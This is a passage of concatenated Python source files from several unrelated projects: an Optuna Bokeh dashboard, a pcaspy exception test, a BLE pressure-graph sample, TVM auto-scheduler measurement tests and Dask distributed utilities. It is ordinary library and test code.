f'PARTITION OF {tblname} '
f'FOR VALUES FROM (\'{start_timestamp}\') to (\'{end_timestamp}\');'
)
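# Example sketch (an assumption): for tblname='main_jobevent' during the
# 14:00 UTC hour, the statement issued is roughly:
#
#     CREATE TABLE IF NOT EXISTS main_jobevent_20210501_14
#     PARTITION OF main_jobevent
#     FOR VALUES FROM ('2021-05-01 14:00:00+00:00') to ('2021-05-01 15:00:00+00:00');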
def cleanup_new_process(func):
"""
    Close the Django database connection and cache connection before executing `func`, the entry point of a new thread or process.
"""
@wraps(func)
def wrapper_cleanup_new_process(*args, **kwargs):
from awx.conf.settings import SettingsWrapper # noqa
django_connection.close()
django_cache.close()
SettingsWrapper.initialize()
return func(*args, **kwargs)
return wrapper_cleanup_new_process
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
import optuna.logging
import optuna.structs
import optuna.study
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in [
'trial_id', 'state', 'value', 'params', 'datetime_start',
'datetime_complete'
]
])
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'trial_id': [trial.trial_id for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
    # This is not a very clean way to launch the Bokeh server. A seemingly better
    # alternative is to instantiate and launch `bokeh.server.server.Server` ourselves.
    # However, with that approach we found that CDS updates were not reflected in
    # browsers, at least on Bokeh version 0.12.15. It would also require a lot of manual
    # server configuration that the single line below handles automatically, so for now
    # we stick with Bokeh's CLI entry point.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
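# Editorial usage sketch (not part of the original module): one plausible way to
# launch the dashboard for an in-memory study, assuming the old-style Optuna API
# that this module targets. The objective function below is made up for
# illustration; nothing here is executed on import.
def _example_dashboard_usage():
    def objective(trial):
        x = trial.suggest_uniform('x', -10, 10)
        return (x - 2) ** 2

    study = optuna.create_study()
    study.optimize(objective, n_trials=20)
    serve(study)  # or: write(study, 'dashboard.html')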
def _run():
# type: () -> None
    # Note that `_study` and `optuna.dashboard._study` are different objects here: this module
    # is loaded by Bokeh under a generated name (`bk_script_????`), not as `optuna.dashboard`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
exceptionTest.py
|
#!/usr/bin/env python
from pcaspy import Driver, SimpleServer
import time
prefix = 'MTEST:'
pvdb = {
'RAND' : {
'prec' : 3,
'count': 3,
},
}
import threading
import numpy
class myDriver(Driver):
def __init__(self):
super(myDriver, self).__init__()
self.value = numpy.array([1,2,3])
tid = threading.Thread(target = self.do)
tid.setDaemon(True)
tid.start()
    def read(self, reason):
        # 'foo' is intentionally undefined: reading this PV raises a NameError so
        # that exception handling in the driver's read path can be exercised.
        foo
        pass
def write(self, reason, value):
pass
def do(self,):
while True:
self.value[1] += 1
self.setParam('RAND', self.value)
self.updatePVs()
time.sleep(1)
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = myDriver()
# process CA transactions
while True:
server.process(0.1)
|
sample_graph.py
|
import asyncio
import logging
import multiprocessing
from datetime import datetime
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
import lelof1py as f1client
from sample_gui import *
class GraphContext:
graph_x_count = 0
graph_x = []
graph_y = []
figure = None
line = None
animation = None
snapshot = None
limit = 400
interval = 100
def __init__(self, queue):
self.snapshot = dict()
self.queue = queue
def graph_runner(self):
logging.info('creating graph')
try:
self.figure = pyplot.figure()
self.line, = pyplot.plot_date(self.graph_x, self.graph_y, '-')
self.animation = FuncAnimation(self.figure, self.update_graph, interval=self.interval)
pyplot.show()
except Exception as e:
logging.exception('error creating graph: %s', e)
raise e
def update_graph(self, frame):
try:
if not self.queue:
return
if not self.queue.empty():
read = self.queue.get_nowait()
if read:
logging.debug('got data from queue, setting %s = %s', read[0], read[1])
self.snapshot[read[0]] = read[1]
logging.debug('updating graph')
if 'pressure' in self.snapshot:
self.graph_x.append(datetime.now())
self.graph_y.append(self.snapshot['pressure'])
self.graph_x_count = self.graph_x_count + 1
if self.graph_x_count > self.limit:
self.graph_x = self.graph_x[-self.limit:]
self.graph_y = self.graph_y[-self.limit:]
self.graph_x_count = self.limit
self.line.set_data(self.graph_x, self.graph_y)
self.figure.gca().relim()
self.figure.gca().autoscale_view()
logging.debug('updated graph')
return self.line,
except Exception as e:
logging.exception('error updating graph: %s', e)
raise e
# Initialize context with service
class GUISampleGraph(GUISample):
'''
Complete sample of device discovery, connection and control with simple GUI
'''
def __init__(self, queue, loop, refresh_interval=1/100):
'''
Initializes the window and prepares the layout
'''
self.queue = queue
super(GUISampleGraph, self).__init__(loop, refresh_interval)
async def post_construct(self):
'''
        Method to be overridden
'''
self.tasks.append(self.loop.create_task(self.sensor_status_updater(1)))
def temperature_and_pressure_changed(self, new_value):
'''
Handle a change in pressure or temperature data
'''
super(GUISampleGraph, self).temperature_and_pressure_changed(new_value)
self.queue.put(['pressure', new_value[1]])
if __name__ == '__main__':
# Configure logging to a basic level
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)
# Configure logging for the library
logging.getLogger(f1client.Constants.LOGGER_NAME).setLevel(logging.DEBUG)
logging.getLogger(f1client.Constants.LOGGER_IO_NAME).setLevel(logging.INFO)
logging.getLogger(f1client.Constants.LOGGER_CALLBACK_NAME).setLevel(logging.INFO)
logging.getLogger('matplotlib').setLevel(logging.INFO)
# Configure logging for the backend BLE adapter (bleak)
logging.getLogger('bleak').setLevel(logging.INFO)
# use the multiprocessing module to perform the plotting activity in another process (i.e., on another core):
queue = multiprocessing.Queue(1000)
gc = GraphContext(queue)
job_for_another_core = multiprocessing.Process(target=gc.graph_runner)
# Run the sample in asyncio event loop
loop = asyncio.get_event_loop()
app = GUISampleGraph(queue, loop)
job_for_another_core.start()
loop.run_forever()
loop.close()
|
test_auto_scheduler_measure.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test measurement and log serialization. """
import multiprocessing
import tvm
from tvm import topi
from tvm import te, auto_scheduler
import tempfile
import tvm.testing
from test_auto_scheduler_common import matmul_auto_scheduler_test, get_tiled_matmul
def record_common(dag, s):
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target)
inp = auto_scheduler.measure.MeasureInput(task, s)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
# Test in-memory record processing.
record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res)
r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str)
# Only check the workload_key for simplification.
assert inp.task.workload_key == r_inp.task.workload_key
assert str(res) == str(r_res)
# Test file-based record processing.
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
s1 = dag.infer_bound_from_state(s)
s2 = dag.infer_bound_from_state(inputs[0].state)
assert s1 == s2
assert not (s1 == dag.get_init_state())
def test_record_split_reorder_fuse_annotation():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Split
its0 = s.split(C, s[C].iters[0], [4, 8, 8])
its1 = s.split(C, s[C].iters[4], [8, 4, 4])
# Reorder
s.reorder(
C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]]
)
# Fuse
s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]])
# Parallel
s.parallel(C, s[C].iters[0])
    # Thread bind (blockIdx & threadIdx are GPU concepts; they are used here only to exercise record serialization)
s.bind(C, s[C].iters[1], "blockIdx.x")
s.bind(C, s[C].iters[2], "threadIdx.z")
s.bind(C, s[C].iters[3], "vthread")
# Unroll
s.unroll(C, s[C].iters[4])
# Vectorize
s.vectorize(C, s[C].iters[6])
record_common(dag, s)
def test_record_compute_at_root_inline_cache_read_write():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
AA = topi.nn.relu(A)
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Cache Write
C_shared = s.cache_write(C, "shared")
# Compute At
s.compute_at(C_shared, C, s[C].iters[0])
# Cache Read
B_global = s.cache_read(B, "global", [C_shared])
s.compute_at(B_global, C_shared, s[C_shared].iters[2])
# Compute Inline
s.compute_inline(AA)
# Compute Root
s.compute_root(C_shared)
record_common(dag, s)
def test_record_follow_split_follow_fused_split():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
dag = auto_scheduler.ComputeDAG([A, B, E])
s = dag.get_init_state()
# Follow Split
s.split(C, s[C].iters[0], [4, 2, 8, 4], True)
split_step0 = len(s.transform_steps) - 1
s.follow_split(C, s[C].iters[5], split_step0, 4)
# Follow Fused Split
its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True)
split_step1 = len(s.transform_steps) - 1
its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True)
split_step2 = len(s.transform_steps) - 1
its = []
for i0, i1 in zip(its0, its1):
its.append(i0)
its.append(i1)
for i in range(0, 5):
s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]])
s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True)
record_common(dag, s)
def test_record_pragma_storage_align_rfactor():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Rfactor
ko, _ = s.split(C, s[C].iters[2], [16])
s.rfactor(C, ko, 2)
# Pragma
s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64")
# StorageAlign
s.storage_align(C, s[C].iters[-1], 8, 4)
record_common(dag, s)
def test_recover_measure_input():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag)
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True)
assert str(correct_inp.state) == str(inp.state)
def test_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_measure_local_builder_rpc_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
del measure_ctx
def measure_local_builder_rpc_runner_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_measure_local_builder_rpc_runner()
@tvm.testing.requires_llvm
def test_measure_local_builder_rpc_runner_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=measure_local_builder_rpc_runner_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_measure_target_host():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
target_host="llvm -mtriple=aarch64-linux-gnu",
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(recovered_inp.task.target_host) == str(inp.task.target_host)
if __name__ == "__main__":
test_record_split_reorder_fuse_annotation()
test_record_compute_at_root_inline_cache_read_write()
test_record_follow_split_follow_fused_split()
test_record_pragma_storage_align_rfactor()
test_recover_measure_input()
test_measure_local_builder_runner()
test_measure_local_builder_rpc_runner()
test_measure_target_host()
|
utils.py
|
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import Any, Dict, List
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
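# Editorial usage sketch (not part of the library): ``has_arg`` follows
# ``__wrapped__`` chains, so it also sees the signature of functions decorated
# with ``functools.wraps``.
def _has_arg_usage_sketch():
    def base(x, y):
        return x + y

    @functools.wraps(base)
    def wrapped(*args, **kwargs):
        return base(*args, **kwargs)

    assert has_arg(wrapped, "y")
    assert not has_arg(wrapped, "z")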
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
    ValueError is raised if the interface doesn't exist or does not have an
    IPv4 address associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
    # Tornado's PollIOLoop doesn't raise when used after being closed, so check for that ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
        # We flag the thread state as asynchronous, which will make sync() calls
        # within `func` use async semantics. In order to support concurrent
        # calls to sync(), `asynchronous` is used as a reference counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
    Several loop runners can safely share the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
